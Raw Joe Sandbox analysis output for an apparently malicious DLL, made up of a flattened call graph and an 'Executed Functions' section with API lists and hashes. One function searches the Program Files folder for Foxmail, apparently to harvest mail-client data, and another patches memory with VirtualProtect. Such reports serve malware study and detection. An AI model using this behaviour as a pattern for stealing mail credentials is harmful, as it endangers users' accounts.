7707->7698 7708->7709 7711 100057fd 7709->7711 7710->7705 7714 100056b9 RtlLeaveCriticalSection 7711->7714 7713 10005807 7713->7707 7714->7713 7716 10005815 ___DestructExceptionObject 7715->7716 7723 10005671 RtlEnterCriticalSection 7716->7723 7718 1000581f 7724 10005a7f 7718->7724 7720 10005832 7728 10005848 7720->7728 7722 10005840 _abort 7722->7701 7723->7718 7725 10005a8e __fassign 7724->7725 7726 10005ab5 __fassign 7724->7726 7725->7726 7727 10007cc2 __fassign 20 API calls 7725->7727 7726->7720 7727->7726 7731 100056b9 RtlLeaveCriticalSection 7728->7731 7730 10005852 7730->7722 7731->7730 7733 1000384b ___vcrt_freefls@4 7732->7733 7735 1000382d 7732->7735 7733->7655 7734 1000383b 7737 10003ba2 ___vcrt_FlsSetValue 6 API calls 7734->7737 7735->7734 7738 10003b67 7735->7738 7737->7733 7739 10003a82 try_get_function 5 API calls 7738->7739 7740 10003b81 7739->7740 7741 10003b99 TlsGetValue 7740->7741 7742 10003b8d 7740->7742 7741->7742 7742->7734 7749 10003856 7743->7749 7745 100023f1 7745->7649 7746 100053da 7745->7746 7747 10005b7a __dosmaperr 20 API calls 7746->7747 7748 100023fd 7747->7748 7748->7647 7748->7648 7750 10003862 GetLastError 7749->7750 7751 1000385f 7749->7751 7752 10003b67 ___vcrt_FlsGetValue 6 API calls 7750->7752 7751->7745 7753 10003877 7752->7753 7754 100038dc SetLastError 7753->7754 7755 10003ba2 ___vcrt_FlsSetValue 6 API calls 7753->7755 7760 10003896 7753->7760 7754->7745 7756 10003890 7755->7756 7757 100038b8 7756->7757 7758 10003ba2 ___vcrt_FlsSetValue 6 API calls 7756->7758 7756->7760 7759 10003ba2 ___vcrt_FlsSetValue 6 API calls 7757->7759 7757->7760 7758->7757 7759->7760 7760->7754 6136 1000281c 6139 10002882 6136->6139 6142 10003550 6139->6142 6141 1000282a 6143 1000358a 6142->6143 6144 1000355d 6142->6144 6143->6141 6144->6143 6145 100047e5 ___std_exception_copy 21 API calls 6144->6145 6146 1000357a 6145->6146 6146->6143 6148 1000544d 6146->6148 6149 1000545a 6148->6149 6151 10005468 6148->6151 6149->6151 6155 1000547f 6149->6155 6150 10006368 __dosmaperr 20 API calls 6152 10005470 6150->6152 6151->6150 6157 100062ac 6152->6157 6154 1000547a 6154->6143 6155->6154 6156 10006368 __dosmaperr 20 API calls 6155->6156 6156->6152 6160 10006231 6157->6160 6159 100062b8 6159->6154 6161 10005b7a __dosmaperr 20 API calls 6160->6161 6162 10006247 6161->6162 6163 100062a6 6162->6163 6166 10006255 6162->6166 6171 100062bc IsProcessorFeaturePresent 6163->6171 6165 100062ab 6167 10006231 ___std_exception_copy 26 API calls 6165->6167 6168 10002ada _ValidateLocalCookies 5 API calls 6166->6168 6169 100062b8 6167->6169 6170 1000627c 6168->6170 6169->6159 6170->6159 6172 100062c7 6171->6172 6175 100060e2 6172->6175 6176 100060fe ___scrt_fastfail 6175->6176 6177 1000612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6176->6177 6180 100061fb ___scrt_fastfail 6177->6180 6178 10002ada _ValidateLocalCookies 5 API calls 6179 10006219 GetCurrentProcess TerminateProcess 6178->6179 6179->6165 6180->6178 7761 10004bdd 7762 10004c08 7761->7762 7763 10004bec 7761->7763 7764 10006d60 51 API calls 7762->7764 7763->7762 7765 10004bf2 7763->7765 7766 10004c0f GetModuleFileNameA 7764->7766 7767 10006368 __dosmaperr 20 API calls 7765->7767 7769 10004c33 7766->7769 7768 10004bf7 7767->7768 7770 100062ac ___std_exception_copy 26 API calls 7768->7770 7784 10004d01 7769->7784 7771 10004c01 7770->7771 7776 10004c72 7778 10004d01 38 API calls 7776->7778 7777 10004c66 7779 10006368 __dosmaperr 20 API calls 7777->7779 7781 10004c88 7778->7781 7783 10004c6b 7779->7783 7780 1000571e _free 20 API calls 7780->7771 7782 1000571e _free 20 API calls 7781->7782 7781->7783 7782->7783 7783->7780 7786 10004d26 7784->7786 7788 10004d86 7786->7788 7796 100070eb 7786->7796 7787 10004c50 7790 10004e76 7787->7790 7788->7787 7789 100070eb 38 API calls 7788->7789 7789->7788 7791 10004c5d 7790->7791 7792 10004e8b 7790->7792 7791->7776 7791->7777 7792->7791 7793 1000637b _abort 20 API calls 7792->7793 7794 10004eb9 7793->7794 7795 1000571e _free 20 API calls 7794->7795 7795->7791 7799 10007092 7796->7799 7800 100054a7 __fassign 38 API calls 7799->7800 7801 100070a6 7800->7801 7801->7786 7160 10007260 GetStartupInfoW 7161 10007286 7160->7161 7163 10007318 7160->7163 7161->7163 7166 10008be3 7161->7166 7164 100072af 7164->7163 7165 100072dd GetFileType 7164->7165 7165->7164 7167 10008bef ___DestructExceptionObject 7166->7167 7168 10008c13 7167->7168 7169 10008bfc 7167->7169 7179 10005671 RtlEnterCriticalSection 7168->7179 7171 10006368 __dosmaperr 20 API calls 7169->7171 7173 10008c01 7171->7173 7172 10008c1f 7178 10008c4b 7172->7178 7180 10008b34 7172->7180 7174 100062ac ___std_exception_copy 26 API calls 7173->7174 7176 10008c0b _abort 7174->7176 7176->7164 7187 10008c72 7178->7187 7179->7172 7181 1000637b _abort 20 API calls 7180->7181 7183 10008b46 7181->7183 7182 10008b53 7184 1000571e _free 20 API calls 7182->7184 7183->7182 7185 10005eb7 11 API calls 7183->7185 7186 10008ba5 7184->7186 7185->7183 7186->7172 7190 100056b9 RtlLeaveCriticalSection 7187->7190 7189 10008c79 7189->7176 7190->7189 7454 100081a0 7455 100081d9 7454->7455 7456 100081dd 7455->7456 7467 10008205 7455->7467 7457 10006368 __dosmaperr 20 API calls 7456->7457 7458 100081e2 7457->7458 7460 100062ac ___std_exception_copy 26 API calls 7458->7460 7459 10008529 7461 10002ada _ValidateLocalCookies 5 API calls 7459->7461 7462 100081ed 7460->7462 7463 10008536 7461->7463 7464 10002ada _ValidateLocalCookies 5 API calls 7462->7464 7466 100081f9 7464->7466 7467->7459 7468 100080c0 7467->7468 7469 100080db 7468->7469 7470 10002ada _ValidateLocalCookies 5 API calls 7469->7470 7471 10008152 7470->7471 7471->7467 7802 1000a1e0 7805 1000a1fe 7802->7805 7804 1000a1f6 7807 1000a203 7805->7807 7806 1000aa53 21 API calls 7809 1000a42f 7806->7809 7807->7806 7808 1000a298 7807->7808 7808->7804 7809->7804 7191 10009d61 7192 10009d81 7191->7192 7195 10009db8 7192->7195 7194 10009dab 7197 10009dbf 7195->7197 7196 10009e20 7198 1000a90e 7196->7198 7199 1000aa17 21 API calls 7196->7199 7197->7196 7201 10009ddf 7197->7201 7198->7194 7200 10009e6e 7199->7200 7200->7194 7201->7198 7202 1000aa17 21 API calls 7201->7202 7203 1000a93e 7202->7203 7203->7194 7472 100021a1 ___scrt_dllmain_exception_filter 5832 1000c7a7 5833 1000c7be 5832->5833 5837 1000c82c 5832->5837 5833->5837 5844 1000c7e6 GetModuleHandleA 5833->5844 5835 1000c872 5836 1000c835 GetModuleHandleA 5838 1000c83f 5836->5838 5837->5835 5837->5836 5837->5838 5838->5837 5839 1000c85f GetProcAddress 5838->5839 5839->5837 5840 1000c7dd 5840->5837 5840->5838 5841 1000c800 GetProcAddress 5840->5841 5841->5837 5842 1000c80d VirtualProtect 5841->5842 5842->5837 5843 1000c81c VirtualProtect 5842->5843 5843->5837 5845 1000c7ef 5844->5845 5847 1000c82c 5844->5847 5856 1000c803 GetProcAddress 5845->5856 5849 1000c872 5847->5849 5850 1000c835 GetModuleHandleA 5847->5850 5855 1000c83f 5847->5855 5848 1000c7f4 5848->5847 5851 1000c800 GetProcAddress 5848->5851 5850->5855 5851->5847 5852 1000c80d VirtualProtect 5851->5852 5852->5847 5853 1000c81c VirtualProtect 5852->5853 5853->5847 5854 1000c85f GetProcAddress 5854->5847 5855->5847 5855->5854 5857 1000c82c 5856->5857 5858 1000c80d VirtualProtect 5856->5858 5860 1000c872 5857->5860 5861 1000c835 GetModuleHandleA 5857->5861 5858->5857 5859 1000c81c VirtualProtect 5858->5859 5859->5857 5863 1000c83f 5861->5863 5862 1000c85f GetProcAddress 5862->5863 5863->5857 5863->5862 6181 1000742b 6182 10007430 6181->6182 6183 10007453 6182->6183 6185 10008bae 6182->6185 6186 10008bdd 6185->6186 6187 10008bbb 6185->6187 6186->6182 6188 10008bd7 6187->6188 6189 10008bc9 RtlDeleteCriticalSection 6187->6189 6190 1000571e _free 20 API calls 6188->6190 6189->6188 6189->6189 6190->6186 7204 1000ac6b 7205 1000ac84 __startOneArgErrorHandling 7204->7205 7207 1000acad __startOneArgErrorHandling 7205->7207 7208 1000b2f0 7205->7208 7209 1000b329 __startOneArgErrorHandling 7208->7209 7210 1000b5c1 __raise_exc RaiseException 7209->7210 7211 1000b350 __startOneArgErrorHandling 7209->7211 7210->7211 7212 1000b393 7211->7212 7213 1000b36e 7211->7213 7214 1000b8b2 __startOneArgErrorHandling 20 API calls 7212->7214 7219 1000b8e1 7213->7219 7216 1000b38e __startOneArgErrorHandling 7214->7216 7217 10002ada _ValidateLocalCookies 5 API calls 7216->7217 7218 1000b3b7 7217->7218 7218->7207 7220 1000b8f0 7219->7220 7221 1000b964 __startOneArgErrorHandling 7220->7221 7222 1000b90f __startOneArgErrorHandling 7220->7222 7223 1000b8b2 __startOneArgErrorHandling 20 API calls 7221->7223 7224 100078a3 __startOneArgErrorHandling 5 API calls 7222->7224 7227 1000b95d 7223->7227 7225 1000b950 7224->7225 7226 1000b8b2 __startOneArgErrorHandling 20 API calls 7225->7226 7225->7227 7226->7227 7227->7216 7473 100060ac 7474 100060b7 7473->7474 7476 100060dd 7473->7476 7475 100060c7 FreeLibrary 7474->7475 7474->7476 7475->7474 7228 1000506f 7229 10005081 7228->7229 7230 10005087 7228->7230 7231 10005000 20 API calls 7229->7231 7231->7230 6191 10005630 6192 1000563b 6191->6192 6194 10005664 6192->6194 6196 10005660 6192->6196 6197 10005eb7 6192->6197 6204 10005688 6194->6204 6198 10005c45 _abort 5 API calls 6197->6198 6199 10005ede 6198->6199 6200 10005ee7 6199->6200 6201 10005efc InitializeCriticalSectionAndSpinCount 6199->6201 6202 10002ada _ValidateLocalCookies 5 API calls 6200->6202 6201->6200 6203 10005f13 6202->6203 6203->6192 6205 10005695 6204->6205 6207 100056b4 6204->6207 6206 1000569f RtlDeleteCriticalSection 6205->6206 6206->6206 6206->6207 6207->6196 7232 10003370 7243 10003330 7232->7243 7244 10003342 7243->7244 7245 1000334f 7243->7245 7246 10002ada _ValidateLocalCookies 5 API calls 7244->7246 7246->7245 7810 100063f0 7811 10006400 7810->7811 7815 10006416 7810->7815 7812 10006368 __dosmaperr 20 API calls 7811->7812 7813 10006405 7812->7813 7814 100062ac ___std_exception_copy 26 API calls 7813->7814 7825 1000640f 7814->7825 7821 10006561 7815->7821 7822 10006480 7815->7822 7829 10006580 7815->7829 7816 10004e76 20 API calls 7820 100064e5 7816->7820 7818 100064ee 7819 1000571e _free 20 API calls 7818->7819 7819->7821 7820->7818 7820->7820 7826 10006573 7820->7826 7840 100085eb 7820->7840 7849 1000679a 7821->7849 7822->7816 7827 100062bc ___std_exception_copy 11 API calls 7826->7827 7828 1000657f 7827->7828 7830 1000658c 7829->7830 7830->7830 7831 1000637b _abort 20 API calls 7830->7831 7832 100065ba 7831->7832 7833 100085eb 26 API calls 7832->7833 7834 100065e6 7833->7834 7835 100062bc ___std_exception_copy 11 API calls 7834->7835 7836 10006615 ___scrt_fastfail 7835->7836 7837 100066b6 FindFirstFileExA 7836->7837 7838 10006705 7837->7838 7839 10006580 26 API calls 7838->7839 7843 1000853a 7840->7843 7841 1000854f 7842 10006368 __dosmaperr 20 API calls 7841->7842 7844 10008554 7841->7844 7848 1000857a 7842->7848 7843->7841 7843->7844 7846 1000858b 7843->7846 7844->7820 7845 100062ac ___std_exception_copy 26 API calls 7845->7844 7846->7844 7847 10006368 __dosmaperr 20 API calls 7846->7847 7847->7848 7848->7845 7850 100067a4 7849->7850 7851 100067b4 7850->7851 7853 1000571e _free 20 API calls 7850->7853 7852 1000571e _free 20 API calls 7851->7852 7854 100067bb 7852->7854 7853->7850 7854->7825 7247 10009e71 7248 10009e95 7247->7248 7249 10009ee6 7248->7249 7251 10009f71 __startOneArgErrorHandling 7248->7251 7252 10009ef8 7249->7252 7255 1000aa53 7249->7255 7253 1000b2f0 21 API calls 7251->7253 7254 1000acad __startOneArgErrorHandling 7251->7254 7253->7254 7256 1000aa70 RtlDecodePointer 7255->7256 7257 1000aa80 7255->7257 7256->7257 7258 1000ab0d 7257->7258 7261 1000ab02 7257->7261 7263 1000aab7 7257->7263 7258->7261 7262 10006368 __dosmaperr 20 API calls 7258->7262 7259 10002ada _ValidateLocalCookies 5 API calls 7260 1000ac67 7259->7260 7260->7252 7261->7259 7262->7261 7263->7261 7264 10006368 __dosmaperr 20 API calls 7263->7264 7264->7261 7481 10003eb3 7482 10005411 38 API calls 7481->7482 7483 10003ebb 7482->7483 6208 1000543d 6209 10005440 6208->6209 6212 100055a8 6209->6212 6223 10007613 6212->6223 6215 100055b8 6217 100055c2 IsProcessorFeaturePresent 6215->6217 6222 100055e0 6215->6222 6219 100055cd 6217->6219 6220 100060e2 _abort 8 API calls 6219->6220 6220->6222 6253 10004bc1 6222->6253 6256 10007581 6223->6256 6226 1000766e 6227 1000767a _abort 6226->6227 6228 10005b7a __dosmaperr 20 API calls 6227->6228 6229 100076a1 _abort 6227->6229 6233 100076a7 _abort 6227->6233 6228->6229 6230 100076f3 6229->6230 6229->6233 6252 100076d6 6229->6252 6231 10006368 __dosmaperr 20 API calls 6230->6231 6232 100076f8 6231->6232 6235 100062ac ___std_exception_copy 26 API calls 6232->6235 6238 1000771f 6233->6238 6270 10005671 RtlEnterCriticalSection 6233->6270 6235->6252 6239 1000777e 6238->6239 6241 10007776 6238->6241 6249 100077a9 6238->6249 6271 100056b9 RtlLeaveCriticalSection 6238->6271 6239->6249 6272 10007665 6239->6272 6244 10004bc1 _abort 28 API calls 6241->6244 6244->6239 6248 10007665 _abort 38 API calls 6248->6249 6275 1000782e 6249->6275 6250 1000780c 6251 10005af6 _abort 38 API calls 6250->6251 6250->6252 6251->6252 6299 1000bdc9 6252->6299 6303 1000499b 6253->6303 6259 10007527 6256->6259 6258 100055ad 6258->6215 6258->6226 6260 10007533 ___DestructExceptionObject 6259->6260 6265 10005671 RtlEnterCriticalSection 6260->6265 6262 10007541 6266 10007575 6262->6266 6264 10007568 _abort 6264->6258 6265->6262 6269 100056b9 RtlLeaveCriticalSection 6266->6269 6268 1000757f 6268->6264 6269->6268 6270->6238 6271->6241 6273 10005af6 _abort 38 API calls 6272->6273 6274 1000766a 6273->6274 6274->6248 6276 10007834 6275->6276 6277 100077fd 6275->6277 6302 100056b9 RtlLeaveCriticalSection 6276->6302 6277->6250 6277->6252 6279 10005af6 GetLastError 6277->6279 6280 10005b12 6279->6280 6281 10005b0c 6279->6281 6283 1000637b _abort 20 API calls 6280->6283 6285 10005b61 SetLastError 6280->6285 6282 10005e08 _abort 11 API calls 6281->6282 6282->6280 6284 10005b24 6283->6284 6286 10005b2c 6284->6286 6287 10005e5e _abort 11 API calls 6284->6287 6285->6250 6289 1000571e _free 20 API calls 6286->6289 6288 10005b41 6287->6288 6288->6286 6291 10005b48 6288->6291 6290 10005b32 6289->6290 6292 10005b6d SetLastError 6290->6292 6293 1000593c _abort 20 API calls 6291->6293 6295 100055a8 _abort 35 API calls 6292->6295 6294 10005b53 6293->6294 6296 1000571e _free 20 API calls 6294->6296 6297 10005b79 6295->6297 6298 10005b5a 6296->6298 6298->6285 6298->6292 6300 10002ada _ValidateLocalCookies 5 API calls 6299->6300 6301 1000bdd4 6300->6301 6301->6301 6302->6277 6304 100049a7 _abort 6303->6304 6311 100049bf 6304->6311 6325 10004af5 GetModuleHandleW 6304->6325 6308 10004a65 6342 10004aa5 6308->6342 6334 10005671 RtlEnterCriticalSection 6311->6334 6313 10004a3c 6315 10004a54 6313->6315 6338 10004669 6313->6338 6314 100049c7 6314->6308 6314->6313 6335 1000527a 6314->6335 6321 10004669 _abort 5 API calls 6315->6321 6316 10004a82 6345 10004ab4 6316->6345 6317 10004aae 6319 1000bdc9 _abort 5 API calls 6317->6319 6324 10004ab3 6319->6324 6321->6308 6326 100049b3 6325->6326 6326->6311 6327 10004b39 GetModuleHandleExW 6326->6327 6328 10004b63 GetProcAddress 6327->6328 6331 10004b78 6327->6331 6328->6331 6329 10004b95 6332 10002ada _ValidateLocalCookies 5 API calls 6329->6332 6330 10004b8c FreeLibrary 6330->6329 6331->6329 6331->6330 6333 10004b9f 6332->6333 6333->6311 6334->6314 6353 10005132 6335->6353 6339 10004698 6338->6339 6340 10002ada _ValidateLocalCookies 5 API calls 6339->6340 6341 100046c1 6340->6341 6341->6315 6375 100056b9 RtlLeaveCriticalSection 6342->6375 6344 10004a7e 6344->6316 6344->6317 6376 10006025 6345->6376 6348 10004ae2 6351 10004b39 _abort 8 API calls 6348->6351 6349 10004ac2 GetPEB 6349->6348 6350 10004ad2 GetCurrentProcess TerminateProcess 6349->6350 6350->6348 6352 10004aea ExitProcess 6351->6352 6356 100050e1 6353->6356 6355 10005156 6355->6313 6357 100050ed ___DestructExceptionObject 6356->6357 6364 10005671 RtlEnterCriticalSection 6357->6364 6359 100050fb 6365 1000515a 6359->6365 6363 10005119 _abort 6363->6355 6364->6359 6368 10005182 6365->6368 6369 1000517a 6365->6369 6366 10002ada _ValidateLocalCookies 5 API calls 6367 10005108 6366->6367 6371 10005126 6367->6371 6368->6369 6370 1000571e _free 20 API calls 6368->6370 6369->6366 6370->6369 6374 100056b9 RtlLeaveCriticalSection 6371->6374 6373 10005130 6373->6363 6374->6373 6375->6344 6377 10006040 6376->6377 6378 1000604a 6376->6378 6380 10002ada _ValidateLocalCookies 5 API calls 6377->6380 6379 10005c45 _abort 5 API calls 6378->6379 6379->6377 6381 10004abe 6380->6381 6381->6348 6381->6349 6382 10001f3f 6383 10001f4b ___DestructExceptionObject 6382->6383 6400 1000247c 6383->6400 6385 10001f52 6386 10002041 6385->6386 6387 10001f7c 6385->6387 6394 10001f57 ___scrt_is_nonwritable_in_current_image 6385->6394 6423 10002639 IsProcessorFeaturePresent 6386->6423 6411 100023de 6387->6411 6390 10002048 6391 10001f8b __RTC_Initialize 6391->6394 6414 100022fc RtlInitializeSListHead 6391->6414 6393 10001f99 ___scrt_initialize_default_local_stdio_options 6415 100046c5 6393->6415 6398 10001fb8 6398->6394 6399 10004669 _abort 5 API calls 6398->6399 6399->6394 6401 10002485 6400->6401 6427 10002933 IsProcessorFeaturePresent 6401->6427 6405 1000249a 6405->6385 6406 10002496 6406->6405 6438 100053c8 6406->6438 6409 100024b1 6409->6385 6512 100024b5 6411->6512 6413 100023e5 6413->6391 6414->6393 6416 100046dc 6415->6416 6417 10002ada _ValidateLocalCookies 5 API calls 6416->6417 6418 10001fad 6417->6418 6418->6394 6419 100023b3 6418->6419 6420 100023b8 ___scrt_release_startup_lock 6419->6420 6421 10002933 ___isa_available_init IsProcessorFeaturePresent 6420->6421 6422 100023c1 6420->6422 6421->6422 6422->6398 6424 1000264e ___scrt_fastfail 6423->6424 6425 100026f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6424->6425 6426 10002744 ___scrt_fastfail 6425->6426 6426->6390 6428 10002491 6427->6428 6429 100034ea 6428->6429 6430 100034ef ___vcrt_initialize_winapi_thunks 6429->6430 6449 10003936 6430->6449 6434 10003505 6435 10003510 6434->6435 6463 10003972 6434->6463 6435->6406 6437 100034fd 6437->6406 6504 10007457 6438->6504 6441 10003529 6442 10003532 6441->6442 6443 10003543 6441->6443 6444 1000391b ___vcrt_uninitialize_ptd 6 API calls 6442->6444 6443->6405 6445 10003537 6444->6445 6446 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6445->6446 6447 1000353c 6446->6447 6508 10003c50 6447->6508 6450 1000393f 6449->6450 6452 10003968 6450->6452 6453 100034f9 6450->6453 6467 10003be0 6450->6467 6454 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6452->6454 6453->6437 6455 100038e8 6453->6455 6454->6453 6485 10003af1 6455->6485 6458 100038fd 6458->6434 6461 10003918 6461->6434 6464 1000399c 6463->6464 6465 1000397d 6463->6465 6464->6437 6466 10003987 RtlDeleteCriticalSection 6465->6466 6466->6464 6466->6466 6472 10003a82 6467->6472 6469 10003bfa 6470 10003c18 InitializeCriticalSectionAndSpinCount 6469->6470 6471 10003c03 6469->6471 6470->6471 6471->6450 6473 10003aaa 6472->6473 6477 10003aa6 __crt_fast_encode_pointer 6472->6477 6473->6477 6478 100039be 6473->6478 6476 10003ac4 GetProcAddress 6476->6477 6477->6469 6483 100039cd try_get_first_available_module 6478->6483 6479 10003a77 6479->6476 6479->6477 6480 100039ea LoadLibraryExW 6481 10003a05 GetLastError 6480->6481 6480->6483 6481->6483 6482 10003a60 FreeLibrary 6482->6483 6483->6479 6483->6480 6483->6482 6484 10003a38 LoadLibraryExW 6483->6484 6484->6483 6486 10003a82 try_get_function 5 API calls 6485->6486 6487 10003b0b 6486->6487 6488 10003b24 TlsAlloc 6487->6488 6489 100038f2 6487->6489 6489->6458 6490 10003ba2 6489->6490 6491 10003a82 try_get_function 5 API calls 6490->6491 6492 10003bbc 6491->6492 6493 10003bd7 TlsSetValue 6492->6493 6494 1000390b 6492->6494 6493->6494 6494->6461 6495 1000391b 6494->6495 6496 1000392b 6495->6496 6497 10003925 6495->6497 6496->6458 6499 10003b2c 6497->6499 6500 10003a82 try_get_function 5 API calls 6499->6500 6501 10003b46 6500->6501 6502 10003b5e TlsFree 6501->6502 6503 10003b52 6501->6503 6502->6503 6503->6496 6507 10007470 6504->6507 6505 10002ada _ValidateLocalCookies 5 API calls 6506 100024a3 6505->6506 6506->6409 6506->6441 6507->6505 6509 10003c7f 6508->6509 6510 10003c59 6508->6510 6509->6443 6510->6509 6511 10003c69 FreeLibrary 6510->6511 6511->6510 6513 100024c4 6512->6513 6514 100024c8 6512->6514 6513->6413 6515 10002639 ___scrt_fastfail 4 API calls 6514->6515 6517 100024d5 ___scrt_release_startup_lock 6514->6517 6516 10002559 6515->6516 6517->6413 7484 100067bf 7489 100067f4 7484->7489 7487 1000571e _free 20 API calls 7488 100067db 7487->7488 7490 10006806 7489->7490 7494 100067cd 7489->7494 7491 1000680b 7490->7491 7493 10006836 7490->7493 7492 1000637b _abort 20 API calls 7491->7492 7495 10006814 7492->7495 7493->7494 7500 100071d6 7493->7500 7494->7487 7494->7488 7498 1000571e _free 20 API calls 7495->7498 7497 10006851 7499 1000571e _free 20 API calls 7497->7499 7498->7494 7499->7494 7501 100071e1 7500->7501 7502 10007209 7501->7502 7503 100071fa 7501->7503 7506 10007218 7502->7506 7509 10008a98 7502->7509 7504 10006368 __dosmaperr 20 API calls 7503->7504 7508 100071ff ___scrt_fastfail 7504->7508 7516 10008acb 7506->7516 7508->7497 7510 10008aa3 7509->7510 7511 10008ab8 RtlSizeHeap 7509->7511 7512 10006368 __dosmaperr 20 API calls 7510->7512 7511->7506 7513 10008aa8 7512->7513 7514 100062ac ___std_exception_copy 26 API calls 7513->7514 7515 10008ab3 7514->7515 7515->7506 7517 10008ae3 7516->7517 7518 10008ad8 7516->7518 7519 10008aeb 7517->7519 7526 10008af4 _abort 7517->7526 7520 100056d0 21 API calls 7518->7520 7521 1000571e _free 20 API calls 7519->7521 7524 10008ae0 7520->7524 7521->7524 7522 10008af9 7525 10006368 __dosmaperr 20 API calls 7522->7525 7523 10008b1e RtlReAllocateHeap 7523->7524 7523->7526 7524->7508 7525->7524 7526->7522 7526->7523 7527 1000474f _abort 7 API calls 7526->7527 7527->7526 7855 10005bff 7863 10005d5c 7855->7863 7858 10005b7a __dosmaperr 20 API calls 7859 10005c1b 7858->7859 7860 10005c28 7859->7860 7861 10005c2b 11 API calls 7859->7861 7862 10005c13 7861->7862 7864 10005c45 _abort 5 API calls 7863->7864 7865 10005d83 7864->7865 7866 10005d9b TlsAlloc 7865->7866 7867 10005d8c 7865->7867 7866->7867 7868 10002ada _ValidateLocalCookies 5 API calls 7867->7868 7869 10005c09 7868->7869 7869->7858 7869->7862

                                                              Executed Functions

                                                              Function 100010F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                              • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                              • FindClose.KERNEL32(00000000), ref: 100011DB
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                              • String ID:
                                                              • API String ID: 1083526818-0
                                                              • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                              • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                              • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                              • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                                              Function 100012EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                              • lstrlenW.KERNEL32(?), ref: 100014C5
                                                              • lstrlenW.KERNEL32(?), ref: 100014E0
                                                              • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                              • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                              • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                              • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                              • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                              • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                              • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                              • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                              • String ID: )$Foxmail$ProgramFiles
                                                              • API String ID: 672098462-2938083778
                                                              • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                              • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                              • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                              • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95
                                                              Function 1000C7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                              • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
